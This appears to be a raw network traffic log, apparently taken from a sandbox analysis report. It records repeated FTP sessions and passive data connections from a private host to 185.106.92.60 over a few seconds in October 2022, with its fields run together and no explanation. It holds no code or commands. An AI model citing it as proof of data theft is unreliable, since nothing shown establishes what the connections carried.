                                                                                                                                    Oct 10, 2022 06:02:59.414999008 CEST4987121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.439179897 CEST2149871185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.439443111 CEST4987121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.439681053 CEST4987121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.463957071 CEST2149871185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.464175940 CEST4987121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.464528084 CEST4987121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.489412069 CEST2149871185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.494530916 CEST4987121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.495306015 CEST4987121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.521760941 CEST2149871185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.525554895 CEST4987121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.530047894 CEST4987121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.555392027 CEST2149871185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.555644989 CEST4987121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.556129932 CEST4987264609192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.583789110 CEST6460949872185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.585933924 CEST4987264609192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.586492062 CEST4987121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.611733913 CEST2149871185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.611922026 CEST4987121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.612431049 CEST4987264609192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.637059927 CEST6460949872185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.637789965 CEST2149871185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.637921095 CEST4987121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.637983084 CEST6460949872185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.638001919 CEST4987121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.638154984 CEST4987264609192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.661896944 CEST2149871185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.661942005 CEST2149871185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.662069082 CEST4987121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.768315077 CEST4987321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.793154955 CEST2149873185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.793447018 CEST4987321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.820923090 CEST2149873185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.820979118 CEST2149873185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.821011066 CEST2149873185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.821172953 CEST4987321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.821538925 CEST4987321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.846941948 CEST2149873185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.847170115 CEST4987321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.862230062 CEST4987321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.886800051 CEST2149873185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.887012959 CEST4987321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.888055086 CEST4987321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.914458036 CEST2149873185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.914736986 CEST4987321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.914915085 CEST4987321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.940543890 CEST2149873185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.940659046 CEST4987321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.941206932 CEST4987321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.965950966 CEST2149873185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.966105938 CEST4987321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.967036009 CEST4987321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.992604971 CEST2149873185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.992928982 CEST4987321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.993309975 CEST4987464610192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.016165972 CEST6461049874185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.016314983 CEST4987464610192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.016578913 CEST4987321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.041733027 CEST2149873185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.042042971 CEST4987321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.042705059 CEST4987464610192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.065457106 CEST6461049874185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.065713882 CEST6461049874185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.065846920 CEST4987464610192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.066489935 CEST2149873185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.066615105 CEST4987321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.073513985 CEST4987321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.098613024 CEST2149873185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.098690033 CEST2149873185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.098848104 CEST4987321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.210474014 CEST4987521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.235687971 CEST2149875185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.235883951 CEST4987521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.264400959 CEST2149875185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.264452934 CEST2149875185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.264486074 CEST2149875185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.264520884 CEST4987521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.264589071 CEST4987521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.271450043 CEST4987521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.299679995 CEST2149875185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.299822092 CEST4987521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.299945116 CEST4987521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.326267958 CEST2149875185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.326376915 CEST4987521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.328284979 CEST4987521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.353367090 CEST2149875185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.353491068 CEST4987521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.356165886 CEST4987521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.382436991 CEST2149875185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.382529974 CEST4987521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.383095980 CEST4987521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.407864094 CEST2149875185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.407999039 CEST4987521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.408952951 CEST4987521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.433331966 CEST2149875185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.433461905 CEST4987521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.434252977 CEST4987664611192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.457750082 CEST6461149876185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.457870007 CEST4987664611192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.458345890 CEST4987521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.483310938 CEST2149875185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.483445883 CEST4987521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.490607023 CEST4987664611192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.514127016 CEST6461149876185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.514281034 CEST6461149876185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.514359951 CEST4987664611192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.514708042 CEST2149875185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.514802933 CEST4987521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.514955997 CEST4987521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.538779974 CEST2149875185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.538806915 CEST2149875185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.538898945 CEST4987521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.676575899 CEST4987721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.699316978 CEST2149877185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.699438095 CEST4987721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.724951982 CEST2149877185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.724987984 CEST2149877185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.725048065 CEST4987721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.725090981 CEST4987721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.725315094 CEST2149877185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.725436926 CEST4987721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.725593090 CEST4987721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.749320984 CEST2149877185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.749483109 CEST4987721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.749653101 CEST4987721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.772233963 CEST2149877185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.772324085 CEST4987721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.772551060 CEST4987721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.796354055 CEST2149877185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.798624039 CEST4987721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.799154997 CEST4987721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.823374033 CEST2149877185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.823467970 CEST4987721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.823863983 CEST4987721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.846393108 CEST2149877185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.846499920 CEST4987721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.847636938 CEST4987721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.871021986 CEST2149877185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.871248960 CEST4987721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.872200966 CEST4987864613192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.895111084 CEST6461349878185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.895298004 CEST4987864613192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.895474911 CEST4987721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.919116020 CEST2149877185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.921797037 CEST4987721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.927406073 CEST4987864613192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.950258017 CEST6461349878185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.951005936 CEST6461349878185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.951041937 CEST2149877185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.951132059 CEST4987864613192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.951273918 CEST4987721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.951296091 CEST4987721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:00.973845005 CEST2149877185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.973885059 CEST2149877185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:00.973953962 CEST4987721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.098701000 CEST4987921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.122356892 CEST2149879185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:01.122553110 CEST4987921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.148844957 CEST2149879185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:01.149024963 CEST2149879185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:01.149132967 CEST2149879185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:01.149295092 CEST4987921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.149442911 CEST4987921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.149442911 CEST4987921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.172913074 CEST2149879185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:01.174700022 CEST4987921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.174700022 CEST4987921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.200871944 CEST2149879185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:01.202613115 CEST4987921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.202708006 CEST4987921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.226016998 CEST2149879185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:01.226608992 CEST4987921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.226843119 CEST4987921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.250375032 CEST2149879185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:01.250638008 CEST4987921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.254461050 CEST4987921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.277734041 CEST2149879185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:01.277857065 CEST4987921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.278701067 CEST4987921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.302212954 CEST2149879185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:01.302313089 CEST4987921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.302546978 CEST4988064614192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.327327967 CEST6461449880185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:01.327435017 CEST4988064614192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.327718973 CEST4987921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.351701975 CEST2149879185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:01.354691982 CEST4987921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.362755060 CEST4988064614192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.386601925 CEST2149879185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:01.386778116 CEST4987921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.386991978 CEST4987921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.387288094 CEST6461449880185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:01.387391090 CEST6461449880185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:01.388720036 CEST4988064614192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.410038948 CEST2149879185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:01.410089016 CEST2149879185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:01.410290956 CEST4987921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.524456024 CEST4988121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.549536943 CEST2149881185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:01.552613020 CEST4988121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.579935074 CEST2149881185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:01.580015898 CEST2149881185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:01.580161095 CEST2149881185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:01.580260038 CEST4988121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.580396891 CEST4988121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.580396891 CEST4988121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.606020927 CEST2149881185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:01.606187105 CEST4988121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.606314898 CEST4988121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.631767988 CEST2149881185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:01.632019043 CEST4988121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.632370949 CEST4988121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.657109976 CEST2149881185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:01.662266016 CEST4988121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.662430048 CEST4988121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.687216997 CEST2149881185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:01.690756083 CEST4988121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.691107035 CEST4988121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.715555906 CEST2149881185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:01.715709925 CEST4988121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.716967106 CEST4988121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.741854906 CEST2149881185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:01.742050886 CEST4988121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.742343903 CEST4988264615192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.765335083 CEST6461549882185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:01.765507936 CEST4988264615192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.766377926 CEST4988121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.792345047 CEST2149881185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:01.792948008 CEST4988121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.793914080 CEST4988264615192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.820089102 CEST6461549882185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:01.820112944 CEST6461549882185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:01.820235014 CEST4988264615192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.820239067 CEST2149881185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:01.820317030 CEST4988121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.820446014 CEST4988121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:01.844425917 CEST2149881185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:01.844472885 CEST2149881185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:01.844535112 CEST4988121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:02.034343958 CEST4988321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:02.058316946 CEST2149883185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:02.058414936 CEST4988321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:02.086280107 CEST2149883185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:02.086332083 CEST2149883185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:02.086460114 CEST4988321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:02.086743116 CEST2149883185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:02.086817026 CEST4988321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:02.086910963 CEST4988321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:02.111196995 CEST2149883185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:02.114773035 CEST4988321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:02.114923000 CEST4988321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:02.139286041 CEST2149883185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:02.142657995 CEST4988321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:02.142889977 CEST4988321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:02.167009115 CEST2149883185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:02.170825958 CEST4988321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:02.170979023 CEST4988321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:02.196511030 CEST2149883185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:02.198774099 CEST4988321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:02.199292898 CEST4988321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:02.223722935 CEST2149883185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:02.226727009 CEST4988321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:02.227638960 CEST4988321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:02.252609015 CEST2149883185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:02.258450985 CEST4988321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:02.258929014 CEST4988464616192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:02.281570911 CEST6461649884185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:02.281697035 CEST4988464616192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:02.281919956 CEST4988321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:02.307008028 CEST2149883185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:02.309834957 CEST4988321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:02.310477018 CEST4988464616192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:02.332906961 CEST6461649884185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:02.333003998 CEST6461649884185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:02.333204031 CEST4988464616192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:02.334532976 CEST2149883185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:02.336936951 CEST4988321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:02.337011099 CEST4988321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:02.362154007 CEST2149883185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:02.362202883 CEST2149883185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:02.362313986 CEST4988321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:02.496834040 CEST4988521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:02.519648075 CEST2149885185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:02.519788980 CEST4988521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:02.550940037 CEST2149885185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:02.551019907 CEST2149885185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:02.551057100 CEST2149885185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:02.551163912 CEST4988521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:02.551163912 CEST4988521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:02.551331997 CEST4988521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:02.575356960 CEST2149885185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:02.577801943 CEST4988521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:02.583769083 CEST4988521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:02.606813908 CEST2149885185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:02.607050896 CEST4988521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:02.607155085 CEST4988521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:02.630232096 CEST2149885185.106.92.60192.168.2.3
